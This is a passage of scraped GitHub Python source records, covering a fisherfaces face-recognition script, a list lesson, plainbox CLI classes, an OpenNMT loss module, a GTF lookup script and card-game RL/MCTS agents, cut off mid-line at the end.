312(train_imgs) - 52 = 260 (same as PCA reduction)\n # print(SW_RANK)\n reference_LDA_coeffs, fisherfaces = compute_LDA_Fisherfaces(Sw, Sb, Wpca, training_data)\n # CHECKED THIS FAR\n\n # fish_images = goto_original_domain(fisherfaces, Wpca)\n # display_eigenvectors(fish_images)\n\n # ''' Start classification procedure'''\n candidate_LDA_coeffs = find_fisher_coeffs(testing_data, Wpca, fisherfaces)\n classification = classify(reference_LDA_coeffs, candidate_LDA_coeffs)\n ground_truth = create_ground_truth()\n bool_array, accuracy = bool_and_accuracy(ground_truth, classification)\n\n failures = identify_failure(bool_array)\n success = identify_success(bool_array)\n\n conf_matrix = confusion_matrix(ground_truth, classification)\n if DISPLAY:\n plot_confusion_matrix(conf_matrix, np.arange(0, NUMBER_PEOPLE), normalize=True)\n display_eigenvectors(testing_data[:, failures] + means[0][:, None])\n display_eigenvectors(testing_data[:, success] + means[0][:, None])\n\n\n print(accuracy)\n\n accuracies.append(accuracy)\n M_PCAs.append(M_PCA)\n save_dict = {'accuracy': accuracies, 'training_split': TRAINING_SPLIT, 'M_PCA': M_PCAs, 'M_LDA': M_LDA,\n 'Sb_rank': SB_RANK, 'Sw_rank': SW_RANK}\n save_name = 'split_{}m_lda{}VARY_M_PCA'.format(TRAINING_SPLIT, M_LDA)\n save_values(save_dict, name=save_name)\n\n # M_PCA_reduction -= 15\n","repo_name":"timotheegath/PR1","sub_path":"ex2LDA.py","file_name":"ex2LDA.py","file_ext":"py","file_size_in_byte":9129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"39440343523","text":"l = [3, 3, 2, 4, 4, 5, 2, 1]\n# 0, 1, 2, 3, 4, 5, 6\n\n# insert\n# l.append(0) # if you only want to insert at the end, please use append\n# l.insert(2, 100) # insert is expensive, append is cheap\n# print(l)\n\n# delete\n# delete based on index\n# val = l.pop() # remove the last\n# val = l.pop(3)\n# print(l, val)\n# delete based on value\n# l.remove(2)\n# print(l)\n\nmax_num = max(l)\nmin_num = min(l)\nsum_num = sum(l)\nprint(max_num, min_num, sum_num)","repo_name":"ybao2000/algorithm_saturday","sub_path":"Lesson_01/list_operation_test.py","file_name":"list_operation_test.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"6215424443","text":"import abc\nimport logging\n\nfrom plainbox.i18n import gettext as _\nfrom plainbox.impl.clitools import CommandBase, ToolBase\nfrom plainbox.impl.providers.special import get_stubbox_def\nfrom plainbox.impl.providers.v1 import all_providers\nfrom plainbox.impl.secure.providers.v1 import Provider1\n\n\nlogger = logging.getLogger(\"plainbox.commands\")\n\n\nclass PlainBoxToolBase(ToolBase):\n \"\"\"\n Base class for implementing commands like 'plainbox'.\n\n The tools support a variety of sub-commands, logging and debugging\n support. If argcomplete module is available and used properly in\n the shell then advanced tab-completion is also available.\n\n There are four methods to implement for a basic tool. Those are:\n\n 1. :meth:`get_exec_name()` -- to know how the command will be called\n 2. :meth:`get_exec_version()` -- to know how the version of the tool\n 3. :meth:`add_subcommands()` -- to add some actual commands to execute\n 4. :meth:`get_config_cls()` -- to know which config to use\n\n This class has some complex control flow to support important and\n interesting use cases. There are some concerns to people that subclass this\n in order to implement their own command line tools.\n\n The first concern is that input is parsed with two parsers, the early\n parser and the full parser. The early parser quickly checks for a fraction\n of supported arguments and uses that data to initialize environment before\n construction of a full parser is possible. The full parser sees the\n reminder of the input and does not re-parse things that where already\n handled.\n\n The second concern is that this command natively supports the concept of a\n config object and a provider object. This may not be desired by all users\n but it is the current state as of this writing. This means that by the time\n eary init is done we have a known provider and config objects that can be\n used to instantiate command objects in :meth:`add_subcommands()`. This API\n might change when full multi-provider is available but details are not\n known yet.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize all the variables, real stuff happens in main()\n \"\"\"\n super().__init__()\n self._config = None # set in late_init()\n self._provider_list = [] # updated in late_init()\n\n @classmethod\n @abc.abstractmethod\n def get_config_cls(cls):\n \"\"\"\n Get the Config class that is used by this implementation.\n\n This can be overridden by subclasses to use a different config class\n that is suitable for the particular application.\n \"\"\"\n\n def late_init(self, early_ns):\n \"\"\"\n Overridden version of late_init().\n\n This method loads the configuration object and the list of providers\n and stores them as instance attributes.\n \"\"\"\n super().late_init(early_ns)\n # Load plainbox configuration\n self._config = self.get_config_cls().get()\n # XXX: we cannot change _provider_list as the particular list object is\n # already passed as argument to several command classes. It seems safe\n # to append items to it though.\n self._provider_list.extend(self.get_provider_list(early_ns))\n\n def get_provider_list(self, ns):\n \"\"\"\n Get the list of job providers.\n\n This method looks at --providers argument to figure out which\n providers to expose to all of the commands.\n \"\"\"\n # If the default value of 'None' was set for the checkbox (provider)\n # argument then load the actual provider name from the configuration\n # object (default for that is 'auto').\n if ns.providers is None:\n ns.providers = self._config.default_provider\n assert ns.providers in ('all', 'stub')\n # Decide which providers to expose to the rest of plainbox\n if ns.providers == 'all':\n return self._load_really_all_providers()\n elif ns.providers == 'stub':\n return self._load_stub_provider_only()\n\n def _load_really_all_providers(self):\n provider_list = []\n # StubBox is always enabled\n provider_list.append(\n Provider1.from_definition(get_stubbox_def(), secure=False))\n # Load all normal providers\n all_providers.load()\n provider_list.extend(all_providers.get_all_plugin_objects())\n return provider_list\n\n def _load_stub_provider_only(self):\n return [Provider1.from_definition(get_stubbox_def(), secure=False)]\n\n def add_early_parser_arguments(self, parser):\n \"\"\"\n Overridden version of add_early_parser_arguments().\n\n This method adds the --providers argument to the set of early parser\n arguments, so that it is visible in autocomplete and help.\n \"\"\"\n group = parser.add_argument_group(\n title=_(\"provider list and development\"))\n group.add_argument(\n '--providers',\n action='store',\n choices=['all', 'stub'],\n # None is a special value that means 'use whatever is configured'\n default=None,\n help=_(\"which providers to load\"))\n super().add_early_parser_arguments(parser)\n\n\nclass PlainBoxCommand(CommandBase):\n \"\"\"\n Simple interface class for plainbox commands.\n\n Command objects like this are consumed by PlainBoxTool subclasses to\n implement hierarchical command system. The API supports arbitrary many sub\n commands in arbitrary nesting arrangement.\n \"\"\"\n\n gettext_domain = \"plainbox\"\n","repo_name":"Roadmaster/checkbox","sub_path":"plainbox/plainbox/impl/commands/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"8552415650","text":"\"\"\"\nThis file handles the details of the loss function during training.\n\nThis includes: LossComputeBase and the standard NMTLossCompute, and\n sharded loss compute stuff.\n\"\"\"\nfrom __future__ import division\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\nimport onmt\nimport onmt.io\n\nTGT_VOCAB_SIZE = 606\nclass LossComputeBase(nn.Module):\n \"\"\"\n Class for managing efficient loss computation. Handles\n sharding next step predictions and accumulating mutiple\n loss computations\n\n\n Users can implement their own loss computation strategy by making\n subclass of this one. Users need to implement the _compute_loss()\n and make_shard_state() methods.\n\n Args:\n generator (:obj:`nn.Module`) :\n module that maps the output of the decoder to a\n distribution over the target vocabulary.\n tgt_vocab (:obj:`Vocab`) :\n torchtext vocab object representing the target output\n normalzation (str): normalize by \"sents\" or \"tokens\"\n \"\"\"\n def __init__(self, generator, tgt_vocab):\n super(LossComputeBase, self).__init__()\n self.generator = generator\n self.tgt_vocab = tgt_vocab\n self.padding_idx = tgt_vocab.stoi[onmt.io.PAD_WORD]\n\n def _make_shard_state(self, batch, output, range_, attns=None):\n \"\"\"\n Make shard state dictionary for shards() to return iterable\n shards for efficient loss computation. Subclass must define\n this method to match its own _compute_loss() interface.\n Args:\n batch: the current batch.\n output: the predict output from the model.\n range_: the range of examples for computing, the whole\n batch or a trunc of it?\n attns: the attns dictionary returned from the model.\n \"\"\"\n return NotImplementedError\n\n def _compute_loss(self, batch, output, target, **kwargs):\n \"\"\"\n Compute the loss. Subclass must define this method.\n\n Args:\n\n batch: the current batch.\n output: the predict output from the model.\n target: the validate target to compare output with.\n **kwargs(optional): additional info for computing loss.\n \"\"\"\n return NotImplementedError\n\n def monolithic_compute_loss(self, batch, output, attns, stage1=True):\n \"\"\"\n Compute the forward loss for the batch.\n\n Args:\n batch (batch): batch of labeled examples\n output (:obj:`FloatTensor`):\n output of decoder model `[tgt_len x batch x hidden]`\n attns (dict of :obj:`FloatTensor`) :\n dictionary of attention distributions\n `[tgt_len x batch x src_len]`\n stage1: is it stage1\n Returns:\n :obj:`onmt.Statistics`: loss statistics\n \"\"\"\n if stage1:\n range_ = (0, batch.tgt1.size(0))\n else:\n range_ = (0, batch.tgt2.size(0))\n shard_state = self._make_shard_state(batch, output, range_, attns)\n _, batch_stats = self._compute_loss(batch, **shard_state)\n\n return batch_stats\n\n def sharded_compute_loss(self, batch, output, attns,\n cur_trunc, trunc_size, shard_size,\n normalization, retain_graph=False):\n \"\"\"Compute the forward loss and backpropagate. Computation is done\n with shards and optionally truncation for memory efficiency.\n\n Also supports truncated BPTT for long sequences by taking a\n range in the decoder output sequence to back propagate in.\n Range is from `(cur_trunc, cur_trunc + trunc_size)`.\n\n Note sharding is an exact efficiency trick to relieve memory\n required for the generation buffers. Truncation is an\n approximate efficiency trick to relieve the memory required\n in the RNN buffers.\n\n Args:\n batch (batch) : batch of labeled examples\n output (:obj:`FloatTensor`) :\n output of decoder model `[tgt_len x batch x hidden]`\n attns (dict) : dictionary of attention distributions\n `[tgt_len x batch x src_len]`\n cur_trunc (int) : starting position of truncation window\n trunc_size (int) : length of truncation window\n shard_size (int) : maximum number of examples in a shard\n normalization (int) : Loss is divided by this number\n\n Returns:\n :obj:`onmt.Statistics`: validation loss statistics\n\n \"\"\"\n batch_stats = onmt.Statistics()\n range_ = (cur_trunc, cur_trunc + trunc_size)\n shard_state = self._make_shard_state(batch, output, range_, attns)\n\n for shard in shards(shard_state, shard_size, retain_graph=retain_graph):\n loss, stats = self._compute_loss(batch, **shard)\n\n loss.div(normalization).backward()\n batch_stats.update(stats)\n\n return batch_stats\n\n def _stats(self, loss, scores, target):\n \"\"\"\n Args:\n loss (:obj:`FloatTensor`): the loss computed by the loss criterion.\n scores (:obj:`FloatTensor`): a score for each possible output\n target (:obj:`FloatTensor`): true targets\n\n Returns:\n :obj:`Statistics` : statistics for this batch.\n \"\"\"\n pred = scores.max(1)[1]\n non_padding = target.ne(self.padding_idx)\n num_correct = pred.eq(target) \\\n .masked_select(non_padding) \\\n .sum()\n return onmt.Statistics(loss[0], non_padding.sum(), num_correct)\n\n def _bottle(self, v):\n return v.view(-1, v.size(2))\n\n def _unbottle(self, v, batch_size):\n return v.view(-1, batch_size, v.size(1))\n\n\nclass NMTLossCompute(LossComputeBase):\n \"\"\"\n Standard NMT Loss Computation.\n \"\"\"\n def __init__(self, generator, tgt_vocab, normalization=\"sents\",\n label_smoothing=0.0, decoder_type='rnn'):\n super(NMTLossCompute, self).__init__(generator, tgt_vocab)\n assert (label_smoothing >= 0.0 and label_smoothing <= 1.0)\n self.decoder_type = decoder_type\n if label_smoothing > 0:\n # When label smoothing is turned on,\n # KL-divergence between q_{smoothed ground truth prob.}(w)\n # and p_{prob. computed by model}(w) is minimized.\n # If label smoothing value is set to zero, the loss\n # is equivalent to NLLLoss or CrossEntropyLoss.\n # All non-true labels are uniformly set to low-confidence.\n self.criterion = nn.KLDivLoss(size_average=False)\n one_hot = torch.randn(1, len(tgt_vocab))\n one_hot.fill_(label_smoothing / (len(tgt_vocab) - 2))\n one_hot[0][self.padding_idx] = 0\n self.register_buffer('one_hot', one_hot)\n else:\n if self.decoder_type == 'pointer':\n weight = torch.ones(TGT_VOCAB_SIZE)\n else:\n weight = torch.ones(len(tgt_vocab))\n weight[self.padding_idx] = 0\n self.criterion = nn.NLLLoss(weight, size_average=False)\n self.confidence = 1.0 - label_smoothing\n\n def _make_shard_state(self, batch, output, range_, attns=None):\n if self.decoder_type == 'pointer':\n return {\n \"output\": attns['std'],\n \"target\": batch.tgt1_planning[range_[0] + 1: range_[1]]\n }\n else:\n assert False\n return {\n \"output\": output,\n \"target\": batch.tgt[range_[0] + 1: range_[1]],\n }\n\n def _compute_loss(self, batch, output, target):\n if self.decoder_type == 'pointer':\n scores = self._bottle(output)\n else:\n scores = self.generator(self._bottle(output))\n\n gtruth = target.view(-1)\n if self.confidence < 1:\n tdata = gtruth.data\n mask = torch.nonzero(tdata.eq(self.padding_idx)).squeeze()\n log_likelihood = torch.gather(scores.data, 1, tdata.unsqueeze(1))\n tmp_ = self.one_hot.repeat(gtruth.size(0), 1)\n tmp_.scatter_(1, tdata.unsqueeze(1), self.confidence)\n if mask.dim() > 0:\n log_likelihood.index_fill_(0, mask, 0)\n tmp_.index_fill_(0, mask, 0)\n gtruth = Variable(tmp_, requires_grad=False)\n\n loss = self.criterion(scores, gtruth)\n if self.confidence < 1:\n # Default: report smoothed ppl.\n # loss_data = -log_likelihood.sum(0)\n loss_data = loss.data.clone()\n else:\n loss_data = loss.data.clone()\n\n stats = self._stats(loss_data, scores.data, target.view(-1).data)\n\n return loss, stats\n\n\ndef filter_shard_state(state, requires_grad=True, volatile=False):\n for k, v in state.items():\n if v is not None:\n if isinstance(v, Variable) and v.requires_grad:\n v = Variable(v.data, requires_grad=requires_grad,\n volatile=volatile)\n yield k, v\n\n\ndef shards(state, shard_size, eval=False, retain_graph=False):\n \"\"\"\n Args:\n state: A dictionary which corresponds to the output of\n *LossCompute._make_shard_state(). The values for\n those keys are Tensor-like or None.\n shard_size: The maximum size of the shards yielded by the model.\n eval: If True, only yield the state, nothing else.\n Otherwise, yield shards.\n\n Yields:\n Each yielded shard is a dict.\n\n Side effect:\n After the last shard, this function does back-propagation.\n \"\"\"\n if eval:\n yield filter_shard_state(state, False, True)\n else:\n # non_none: the subdict of the state dictionary where the values\n # are not None.\n non_none = dict(filter_shard_state(state))\n\n # Now, the iteration:\n # state is a dictionary of sequences of tensor-like but we\n # want a sequence of dictionaries of tensors.\n # First, unzip the dictionary into a sequence of keys and a\n # sequence of tensor-like sequences.\n keys, values = zip(*((k, torch.split(v, shard_size))\n for k, v in non_none.items()))\n\n # Now, yield a dictionary for each shard. The keys are always\n # the same. values is a sequence of length #keys where each\n # element is a sequence of length #shards. We want to iterate\n # over the shards, not over the keys: therefore, the values need\n # to be re-zipped by shard and then each shard can be paired\n # with the keys.\n for shard_tensors in zip(*values):\n yield dict(zip(keys, shard_tensors))\n\n # Assumed backprop'd\n variables = ((state[k], v.grad.data) for k, v in non_none.items()\n if isinstance(v, Variable) and v.grad is not None)\n inputs, grads = zip(*variables)\n torch.autograd.backward(inputs, grads, retain_graph=retain_graph)\n","repo_name":"ratishsp/data2text-plan-py","sub_path":"onmt/Loss.py","file_name":"Loss.py","file_ext":"py","file_size_in_byte":11029,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"71"}
+{"seq_id":"9105326314","text":"#!/usr/bin/env python3\n\n\"\"\"\nRetrieve annotations closest to the query position from a GTF file.\n\"\"\"\n\nimport sys\n\ndef indexGTF(file):\n index = dict()\n with open(file, \"r\") as f:\n buffer = f.readlines()\n f.close()\n\n n = 0\n for line in buffer:\n if len(line.split(\"\\t\")) <= 1:\n n += 1\n else:\n break\n\n # Remove header\n # print(f\"Removing {n} lines from GTF file\")\n for i in range(n + 1):\n buffer.pop(0)\n\n # Remove bad footers from annotation file\n if len(buffer[len(buffer) - 1].split(\"\\t\")) <= 1:\n buffer.pop(len(buffer) - 1)\n\n for line in buffer:\n x = line.split(\"\\t\")\n try:\n name = x[0]\n source = x[1]\n feature = x[2]\n start = x[3]\n stop = x[4]\n except IndexError:\n print(f\"Bad line: {line}\")\n\n index[name] = [feature, start, stop]\n\n return index\n\ndef showNearestStart(query, index):\n print(f\"> Showing nearest items for starting position query: {query}\")\n\n x = list()\n for i in index:\n pos = index[i][1]\n dist = int(query) - int(pos)\n index[i] = index[i].append(dist)\n x.append([i, dist])\n\n y = list()\n for i in x:\n y.append(abs(i[1]))\n print(min(y))\n\nquery = sys.argv[1]\nindex = indexGTF(sys.argv[2])\n\nshowNearestStart(query, index)\n\n# 1. Index GTF file (get start and end positions, with annotation name)\n# 2. Get query position, and get distance from start position\n# 3. Print annotations with lowest distance\n","repo_name":"ycoles448/wheat-rna-pipeline","sub_path":"bin/getGTFPositions.py","file_name":"getGTFPositions.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"27685307044","text":"import numpy as np\nimport random\nfrom states import rotate_state\nfrom mcts import transform_action_key,MCTSNode\n\nimport asyncio\nimport ipywidgets as widgets\nfrom IPython.display import display,clear_output\n\nclass Agent:\n def __init__(self):\n self.last_observation_id = 0\n\n def cache_samples(self):\n pass\n\n def observe(self,observation_id,prev_action,state,start_flag,end_flag):\n pass\n\n def act(self,state):\n action_set = state.action_set\n a_idx = np.random.choice(len(action_set))\n return action_set[a_idx]\n\nclass RandomAgent(Agent):\n def __init__(self,seed):\n self.last_observation_id = 0\n self.seed = seed\n\n def act(self,state):\n np.random.seed(self.seed)\n action_set = state.action_set\n a_idx = np.random.choice(len(action_set))\n return action_set[a_idx]\n\nclass IpyAgent(Agent):\n def act(self,state):\n ## first, print out relevant infos\n print('-' * 50)\n print('Interactive player:')\n headers,curr_plays,remain_plays = [],[],[]\n for player_idx in range(4):\n target_player = (state.curr_player - len(state.round_plays) + player_idx) % 4\n \n header = ''\n if target_player == state.house:\n header += '△ '\n if player_idx == len(state.round_plays):\n header += '--> '\n target_header = '{}Player {} '.format(header,target_player)\n \n if player_idx < len(state.round_plays):\n target_curr_play = state.ruler.get_codes_repr(state.round_plays[player_idx][1])\n else:\n target_curr_play = '-' * 3\n\n target_remain_structs = state.structs_by_player[target_player]\n target_remain_play = []\n for struct in target_remain_structs:\n struct_codes = state.ruler.get_codes_repr(sum([component[-1] for component in struct[1]],()))\n if struct_codes == '':\n struct_codes = '-' * 3\n target_remain_play.append(struct_codes)\n target_remain_play = ' / '.join(target_remain_play)\n\n headers.append(target_header)\n curr_plays.append(target_curr_play)\n remain_plays.append(target_remain_play)\n\n header_max = np.max([len(header) for header in headers])\n curr_play_max = np.max([len(curr_play) for curr_play in curr_plays])\n for header,curr_play,remain_play in zip(headers,curr_plays,remain_plays):\n print('{} | this round: {} | remain cards: {}.'.format(\n header.ljust(header_max),curr_play.ljust(curr_play_max),remain_play))\n print('-' * 25)\n\n if len(state.best_codes) > 0:\n round_best_play = state.ruler.get_codes_repr(state.best_codes)\n else:\n round_best_play = '-' * 3\n print('Game major {}. Round best play {}, round total score {}. Current game score {}. Stack {}.'.format(\n state.ruler.get_code_repr(51),\n round_best_play,\n sum([state.ruler.get_codes_score(codes) for _,codes in state.round_plays],0),\n state.game_score,\n state.ruler.get_codes_repr(state.stack)))\n print('-' * 25)\n\n ## now provide the options\n action_set = state.action_set\n label0,value0 = 'Please select from below:',([],None,False)\n options = [(label0,value0)] + \\\n [(state.ruler.get_codes_repr(action[0]),action) for action in action_set]\n if len(action_set[0][0]) > 2 and not state.is_first:\n options += [('other combinations',None)] ## allow for combination of single cards\n dropbox = widgets.Dropdown(options=options,index=0,value=value0,label=label0)\n display(dropbox)\n future = asyncio.Future()\n def getvalue(change):\n future.set_result(change.new)\n dropbox.close()\n dropbox.observe(getvalue, 'value')\n return future\n \n def act_single(self,state):\n struct = state.structs_by_player[state.curr_player]\n codes = []\n for suit_enc in range(4):\n for component in struct[suit_enc][1]:\n codes.extend(component[-1])\n codes = sorted(codes)\n label0,value0 = 'Please select from below:',-1\n options = [(label0,value0)] + \\\n [(state.ruler.get_code_repr(code),code) for code in codes] + \\\n [('confirmed',-2)]\n dropbox = widgets.SelectMultiple(options=options,index=[0],value=[value0],label=[label0])\n display(dropbox)\n future = asyncio.Future()\n def getvalue(change):\n if 'confirmed' in dropbox.label:\n if len(dropbox.label) != state.round_num+1:\n print('please recheck size of your play!',end='\\r')\n else:\n future.set_result(change.new)\n dropbox.close()\n else:\n print(','.join([item for item in dropbox.label if item != label0]),end='\\r')\n dropbox.observe(getvalue, 'value')\n return future\n\nclass RlAgent(Agent):\n def __init__(self,model):\n self.action_model = model\n \n self.debug_flag = False\n self.infer_flag = False\n self.sample_collect_flag = False\n self.last_observation_id = 0\n self.value_bootstrap_partial_sample = None\n self.value_bootstrap_samples_cache = []\n\n def cache_samples(self):\n for sample in self.value_bootstrap_samples_cache:\n self.action_model.add_experience(sample)\n self.value_bootstrap_samples_cache = []\n\n def observe(self,observation_id,prev_action,state,start_flag,end_flag):\n if observation_id != self.last_observation_id:\n self.last_observation_id = observation_id\n if self.sample_collect_flag:\n state_vec,actions_vec,direc = state.get_vecs()\n if start_flag:\n self.value_bootstrap_partial_sample = None\n\n if end_flag:\n ## end of game \n if self.value_bootstrap_partial_sample is not None and len(self.value_bootstrap_partial_sample) == 3:\n prev_state_vec,prev_action_vec,prev_score = self.value_bootstrap_partial_sample\n self.value_bootstrap_samples_cache.append((prev_state_vec,prev_action_vec,state.eval_score-prev_score,True,direc,state_vec,actions_vec))\n self.value_bootstrap_partial_sample = None\n\n self.cache_samples()\n \n def act(self,state):\n state_vec,actions_vec,direc = state.get_vecs()\n action_set = state.action_set\n Na = len(action_set)\n if Na == 1:\n a_idx = 0\n else:\n ## rotation\n r = np.random.choice(4)\n rotate_direc = (1 if r % 2 == 0 else -1)\n direc_tmp = direc * rotate_direc\n state_vec_tmp = rotate_state(state_vec,r)\n q_values,probs,action_samples = self.action_model.predict(state_vec_tmp,actions_vec,direc_tmp)\n q_values = q_values * rotate_direc\n \n # q_values,probs,action_samples = self.action_model.predict(state_vec,actions_vec,direc)\n if self.debug_flag:\n ruler = state.ruler\n sort_idxs = np.argsort(q_values)[::-1]\n debug_str = ';'.join(\n [' {},{:.2f}'.format(ruler.get_codes_repr(action_set[i][0]),q_values[i]) \n for i in sort_idxs])\n print(debug_str)\n \n # for r in range(4):\n # state_vec_tmp = rotate_state(state_vec,r)\n # direc_tmp = direc * (1 if r % 2 == 0 else -1)\n # qs_tmp,p_tmp,a_tmp = self.action_model.predict(state_vec_tmp,actions_vec,direc_tmp)\n # print(r,qs_tmp,a_tmp)\n \n if self.infer_flag or random.random() < 0.9:\n a_idx = action_samples\n else:\n a_idx = np.random.choice(Na)\n\n if self.sample_collect_flag:\n ## value bootstrap samples: Q(state,action) -> next reward - current reward + (1 - end) * V(next_state,next_action,next_direc)\n ## manage the previous partial sample (if any) and init the next partial sample\n if self.value_bootstrap_partial_sample is not None and len(self.value_bootstrap_partial_sample) == 3:\n prev_state_vec,prev_action_vec,prev_score = self.value_bootstrap_partial_sample\n self.value_bootstrap_samples_cache.append((prev_state_vec,prev_action_vec,state.eval_score-prev_score,False,direc,state_vec,actions_vec))\n self.value_bootstrap_partial_sample = (state_vec,actions_vec[:,a_idx],state.eval_score)\n\n return action_set[a_idx]\n\nclass MCTSAgent(Agent):\n def __init__(self,model,sim_env,N_search=1000,c_puct=400,temp=1,explore_alpha=0.25,batch_size=8):\n self.action_model = model\n self.sim_env = sim_env\n self.N_search = N_search\n self.c_puct = c_puct\n self.temp = temp\n self.explore_alpha = explore_alpha\n self.batch_size = batch_size\n self.root_node = None\n \n self.debug_flag = False\n self.infer_flag = False\n self.sample_collect_flag = False\n self.last_observation_id = 0\n self.samples_cache = []\n self.samples_partial_cache = []\n\n def cache_samples(self):\n for sample in self.samples_cache:\n self.action_model.add_experience(sample,exp_pool_id=0)\n self.samples_cache = []\n\n def observe(self,observation_id,prev_action,state,start_flag,end_flag):\n if observation_id != self.last_observation_id:\n self.last_observation_id = observation_id\n if start_flag:\n self.init_mcts_tree(state)\n else:\n self.update_mcts_tree(prev_action,state,end_flag)\n\n ## check if the game ends\n if self.sample_collect_flag and end_flag:\n ## value samples: Q(state,action) -> final reward - current reward\n ## update the value samples here\n for sample in self.samples_partial_cache:\n if len(sample) == 6:\n if len(sample[4]) == 1:\n self.samples_cache.append((sample[0],sample[1],sample[2],state.eval_score-sample[3],sample[4],[state.eval_score-sample[3]]))\n else:\n self.samples_cache.append((sample[0],sample[1],sample[2],state.eval_score-sample[3],sample[4],sample[5]))\n self.samples_partial_cache = []\n\n self.cache_samples()\n\n def act(self,state):\n return self.mcts_search(state)\n\n def get_predict_values(self,state):\n if (state.actions_vec.shape[1]) > 0:\n q_values,probs,_ = self.action_model.predict(*state.get_vecs())\n return q_values + state.eval_score,probs\n else:\n return None,None\n\n def init_mcts_tree(self,state):\n self.root_node = MCTSNode(level=0,father=None,father_direc=0,prev_action=None,prob_sa=1,c_puct=self.c_puct)\n self.init_root_node(self.root_node,state)\n\n def update_mcts_tree(self,prev_action,state,end_flag):\n if not end_flag:\n if self.root_node is None or prev_action is None:\n # print('restart mcts tree!')\n self.init_mcts_tree(state)\n else:\n prev_codes = tuple(sorted(prev_action[0]))\n if prev_codes in self.root_node.children:\n self.root_node = self.root_node.children[prev_codes]\n if not self.root_node.is_expanded:\n self.init_root_node(self.root_node,state)\n self.root_node.set_root()\n else:\n self.init_mcts_tree(state)\n\n def init_root_node(self,node,state):\n q_values,probs = self.get_predict_values(state)\n node.state = state\n node.predict_value = state.eval_score\n ## add dirichlet noise to the prior\n dirichlet_noise = np.random.dirichlet(np.full((len(probs),),0.3))\n node.child_probs = probs * (1 - self.explore_alpha) + self.explore_alpha * dirichlet_noise\n # node.child_probs = probs\n self.expand_node(node)\n node.set_root()\n\n def evaluate_node(self,node):\n _,end_flag,state = self.sim_env.step(node.father.state.copy(),node.prev_action,if_display=False)\n if end_flag:\n node.is_leaf = True\n node.predict_value = state.eval_score\n self.update_node(node)\n else:\n node.state = state\n node.is_evaluating = True\n\n def expand_node(self,node):\n next_level = node.level + 1\n # na = len(node.state.action_set)\n node.children = {}\n for prev_action,prob_sa in (zip(node.state.action_set,node.child_probs)):\n node.children[transform_action_key(prev_action)] = MCTSNode(level=next_level,father=node,father_direc=node.state.curr_direc,prev_action=prev_action,\n prob_sa=prob_sa,\n # prob_sa=1/na,\n c_puct=self.c_puct)\n\n node.is_expanded = True\n\n def update_node(self,node):\n # print(node.predict_value)\n value = node.predict_value\n node.update_value(value)\n while (node.father is not None and not node.is_root):\n node = node.father\n node.update_value(value)\n\n def predict_node_batch(self,nodes_queue):\n if len(nodes_queue) > 1:\n max_mask_len = 0\n s_batch,mask_len_batch,direc_batch = [],[],[]\n for node in nodes_queue:\n state = node.state\n state_vec,actions_vec,direc = state.get_vecs()\n mask_len = len(state.action_set)\n s_batch.append(state_vec)\n mask_len_batch.append(mask_len)\n direc_batch.append(direc)\n if mask_len > max_mask_len:\n max_mask_len = mask_len\n\n As = np.zeros((len(nodes_queue),max_mask_len,55),dtype=np.float32)\n for idx,node in enumerate(nodes_queue):\n state = node.state\n mask_len = len(state.action_set)\n As[idx:(idx+1),:mask_len] = state.actions_vec\n v_batch,probs_batch = \\\n self.action_model.predict_batch(\n np.concatenate(s_batch,axis=0),As,\n np.array(mask_len_batch,dtype=np.int64),\n np.array(direc_batch,dtype=np.float32))\n else:\n state = nodes_queue[0].state\n state_vec,actions_vec,direc = state.get_vecs()\n v_batch,probs_batch = \\\n self.action_model.predict_batch(\n state_vec,\n actions_vec,\n np.array([len(state.action_set)],dtype=np.int64),\n np.array([direc],dtype=np.float32))\n\n for node,v,probs in zip(nodes_queue,v_batch,probs_batch):\n na = len(node.state.action_set)\n node.predict_value = node.state.eval_score + v\n node.child_probs = np.maximum(probs[:na],1e-2)\n node.is_evaluating = False\n node.is_evaluated = True\n self.update_node(node)\n\n def mcts_search(self,state):\n action_set = state.action_set\n Na = len(action_set)\n if Na == 1: ## TODO: consider remove this part for more consistent training samples\n action = action_set[0]\n if self.sample_collect_flag:\n ## value samples: Q(state,action) -> final reward - current reward\n ## only init parts here; append the final reward at the end of the game\n state_vec,actions_vec,direc = state.get_vecs()\n self.samples_partial_cache.append((state_vec,actions_vec,direc,state.eval_score,[1],[state.eval_score]))\n else:\n if self.root_node is None:\n self.init_mcts_tree(state)\n\n N_total = max(self.N_search,Na)\n # dirichlet_noise = np.random.dirichlet(np.full((Na,),0.3),N_total+1)\n # dirichlet_noise_value = dirichlet_noise * self.explore_alpha * self.c_puct\n \n # ## print fix depth tree\n # ruler = state.ruler\n # curr_node_prints = [([],[],self.root_node)]\n # for level in range(2):\n # str_ = []\n # curr_node_prints_next = []\n # for key_father,key_curr,node in curr_node_prints:\n # str_.append('({})->({}),{:.0f},{:.0f},{:.0f}'.format(ruler.get_codes_repr(key_father),ruler.get_codes_repr(key_curr),node.predict_value,node.sim_count,node.sim_value))\n # if node.children is not None:\n # for key,value in node.children.items():\n # curr_node_prints_next.append((key_curr,key,value))\n # curr_node_prints = curr_node_prints_next\n # if level > 0:\n # print(level,'; '.join(str_))\n\n counts = 0\n nodes_queue = []\n while counts < N_total:\n if len(nodes_queue) >= self.batch_size:\n self.predict_node_batch(nodes_queue)\n nodes_queue = []\n\n # while len(nodes_queue) < self.batch_size and counts < N_total:\n counts += 1\n curr_node = self.root_node\n # print(counts,self.root_node.sim_count)\n while True:\n if curr_node.is_evaluating:\n self.predict_node_batch(nodes_queue)\n nodes_queue = []\n\n curr_node.update_count()\n\n if curr_node.is_leaf:\n self.update_node(curr_node)\n break\n\n if not curr_node.is_expanded:\n if curr_node.is_evaluated:\n self.expand_node(curr_node)\n else:\n self.evaluate_node(curr_node)\n if curr_node.is_evaluating:\n nodes_queue.append(curr_node)\n break\n\n _,curr_node = curr_node.select_action_by_value()\n # if curr_node.is_root:\n # _,curr_node = curr_node.select_action_by_value_root(dirichlet_noise_value[counts],self.explore_alpha)\n # else:\n # _,curr_node = 